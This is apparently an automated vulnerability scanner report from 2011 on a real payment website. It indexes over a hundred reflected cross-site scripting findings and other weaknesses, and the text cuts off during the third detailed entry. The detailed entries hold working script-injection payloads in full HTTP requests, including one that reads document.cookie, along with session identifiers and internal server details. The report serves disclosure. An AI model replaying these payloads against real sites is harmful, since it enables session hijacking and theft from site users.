XSS, Cross Site Scripting, payments.intuit.com, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Mar 21 14:59:37 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading


1. Cross-site scripting (reflected)

1.1. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

1.2. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

1.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

1.4. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]

1.5. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]

1.6. http://payments.intuit.com/ [Referer HTTP header]

1.7. http://payments.intuit.com/ [Referer HTTP header]

1.8. http://payments.intuit.com/ [Referer HTTP header]

1.9. http://payments.intuit.com/apply-now/ [Referer HTTP header]

1.10. http://payments.intuit.com/apply-now/ [Referer HTTP header]

1.11. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]

1.12. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]

1.13. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]

1.14. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]

1.15. http://payments.intuit.com/products/ [Referer HTTP header]

1.16. http://payments.intuit.com/products/ [Referer HTTP header]

1.17. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]

1.18. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]

1.19. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]

1.20. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]

1.21. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]

1.22. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]

1.23. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]

1.24. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]

1.25. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]

1.26. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]

1.27. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]

1.28. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]

1.29. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]

1.30. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]

1.31. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]

1.32. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]

1.33. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]

1.34. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]

1.35. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]

1.36. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]

1.37. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]

1.38. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]

1.39. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]

1.40. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]

1.41. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]

1.42. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]

1.43. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]

1.44. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]

1.45. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]

1.46. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]

1.47. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]

1.48. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]

1.49. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]

1.50. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]

1.51. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]

1.52. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]

1.53. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]

1.54. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]

1.55. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]

1.56. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]

1.57. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]

1.58. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]

1.59. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]

1.60. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]

1.61. http://payments.intuit.com/support/ [Referer HTTP header]

1.62. http://payments.intuit.com/support/ [Referer HTTP header]

1.63. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]

1.64. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]

1.65. http://payments.intuit.com/ [abTestGroup cookie]

1.66. http://payments.intuit.com/ [abTestGroup cookie]

1.67. http://payments.intuit.com/apply-now/ [abTestGroup cookie]

1.68. http://payments.intuit.com/apply-now/ [abTestGroup cookie]

1.69. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]

1.70. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]

1.71. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]

1.72. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]

1.73. http://payments.intuit.com/products/ [abTestGroup cookie]

1.74. http://payments.intuit.com/products/ [abTestGroup cookie]

1.75. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]

1.76. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]

1.77. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]

1.78. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]

1.79. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]

1.80. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]

1.81. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]

1.82. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]

1.83. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]

1.84. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]

1.85. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]

1.86. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]

1.87. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]

1.88. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]

1.89. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]

1.90. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]

1.91. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]

1.92. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]

1.93. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]

1.94. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]

1.95. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]

1.96. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]

1.97. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]

1.98. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]

1.99. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]

1.100. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]

1.101. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]

1.102. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]

1.103. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]

1.104. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]

1.105. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]

1.106. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]

1.107. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]

1.108. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]

1.109. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]

1.110. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]

1.111. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]

1.112. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]

1.113. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]

1.114. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]

1.115. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]

1.116. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]

1.117. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]

1.118. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]

1.119. http://payments.intuit.com/support/ [abTestGroup cookie]

1.120. http://payments.intuit.com/support/ [abTestGroup cookie]

1.121. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]

1.122. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]

2. Cookie scoped to parent domain

2.1. http://payments.intuit.com/

2.2. http://payments.intuit.com/apply-now/

2.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

2.4. http://payments.intuit.com/apply-now/contact-me.jsp

2.5. http://payments.intuit.com/products/

2.6. http://payments.intuit.com/products/basic-payment-solutions/

2.7. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

2.8. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

2.9. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

2.10. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

2.11. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

2.12. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

2.13. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

2.14. http://payments.intuit.com/products/echecks-and-check-processing.jsp

2.15. http://payments.intuit.com/products/internet-merchant-accounts.jsp

2.16. http://payments.intuit.com/products/online-credit-card-processing.jsp

2.17. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

2.18. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

2.19. http://payments.intuit.com/products/quickbooks-payment-solutions/

2.20. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

2.21. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

2.22. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

2.23. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

2.24. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

2.25. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

2.26. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

2.27. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

2.28. http://payments.intuit.com/sbweb/common/includes/header/super_navigation/includes/search.jsp

2.29. http://payments.intuit.com/support/

2.30. http://payments.intuit.com/support/glossary.jsp

3. Cookie without HttpOnly flag set

3.1. http://payments.intuit.com/

3.2. http://payments.intuit.com/apply-now/

3.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

3.4. http://payments.intuit.com/apply-now/contact-me.jsp

3.5. http://payments.intuit.com/products/

3.6. http://payments.intuit.com/products/basic-payment-solutions/

3.7. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

3.8. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

3.9. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

3.10. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

3.11. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

3.12. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

3.13. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

3.14. http://payments.intuit.com/products/echecks-and-check-processing.jsp

3.15. http://payments.intuit.com/products/internet-merchant-accounts.jsp

3.16. http://payments.intuit.com/products/online-credit-card-processing.jsp

3.17. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

3.18. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

3.19. http://payments.intuit.com/products/quickbooks-payment-solutions/

3.20. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

3.21. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

3.22. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

3.23. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

3.24. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

3.25. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

3.26. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

3.27. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

3.28. http://payments.intuit.com/sbweb/common/includes/header/super_navigation/includes/search.jsp

3.29. http://payments.intuit.com/support/

3.30. http://payments.intuit.com/support/glossary.jsp

4. Source code disclosure

5. Cross-domain Referer leakage

5.1. http://payments.intuit.com/

5.2. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

5.3. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

5.4. http://payments.intuit.com/products/echecks-and-check-processing.jsp

5.5. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

6. Cross-domain script include

7. Email addresses disclosed

7.1. http://payments.intuit.com/apply-now/contact-me.jsp

7.2. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

7.3. http://payments.intuit.com/products/echecks-and-check-processing.jsp

7.4. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

7.5. http://payments.intuit.com/sbweb/common/components/site_catalyst/header/sc_header_scode.js

7.6. http://payments.intuit.com/templates/tt-hp-template/js/jquery.hoverIntent.js

8. Private IP addresses disclosed

8.1. http://payments.intuit.com/

8.2. http://payments.intuit.com/

8.3. http://payments.intuit.com/apply-now/

8.4. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

8.5. http://payments.intuit.com/apply-now/contact-me.jsp

8.6. http://payments.intuit.com/products/

8.7. http://payments.intuit.com/products/basic-payment-solutions/

8.8. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

8.9. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

8.10. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

8.11. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

8.12. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

8.13. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

8.14. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

8.15. http://payments.intuit.com/products/echecks-and-check-processing.jsp

8.16. http://payments.intuit.com/products/internet-merchant-accounts.jsp

8.17. http://payments.intuit.com/products/online-credit-card-processing.jsp

8.18. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

8.19. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

8.20. http://payments.intuit.com/products/quickbooks-payment-solutions/

8.21. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

8.22. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

8.23. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

8.24. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

8.25. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

8.26. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

8.27. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

8.28. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

8.29. http://payments.intuit.com/sbweb/common/includes/header/super_navigation/includes/search.jsp

8.30. http://payments.intuit.com/support/

8.31. http://payments.intuit.com/support/glossary.jsp

9. HTML does not specify charset

10. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 122 instances of this issue:


1.1. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into a JavaScript rest-of-line comment. The payload 5917f%0aalert(1)//0f2714cf68b was submitted in the bas parameter. This input was echoed as 5917f
alert(1)//0f2714cf68b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=card5917f%0aalert(1)//0f2714cf68b HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=um+gvySdzc86szkJlLldjw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E2A450A0805192AA117E3E34C4700
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161486


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
cked',true);    
            }
        if(selectedServiceIndicator == "selected_check_service_id_3")
        {
               //$("#selected_check_service_id_3").attr('checked',true);    
        }
           
       }
       //var bas = 'card5917f
alert(1)//0f2714cf68b
';
    //var parameterString1="changeInService=alreadyHvScanner&bas="+bas+"&category=changeInService&categoryType=7";
    //invokeAJAX(parameterString1);
   }

   
   function processResponse(respo
...[SNIP]...

1.2. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into an HTML comment. The payload d670a--><script>alert(1)</script>afe168cf1c was submitted in the bas parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardd670a--><script>alert(1)</script>afe168cf1c HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=kH34osQKwEbdp4qaYa77bg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E11310A0805192AA117E3E38F36B5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161643


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input type="radio" id="is_existing_merchant_true" name="is_existing_merchant" value="true" onclick="setMerchantFlag('true','cardd670a--><script>alert(1)</script>afe168cf1c');" />
...[SNIP]...

1.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>c5a639cbe3e was submitted in the bas parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardfbd42"><script>alert(1)</script>c5a639cbe3e HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=6X7mnOxDx5FEMyyRLsH-gg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
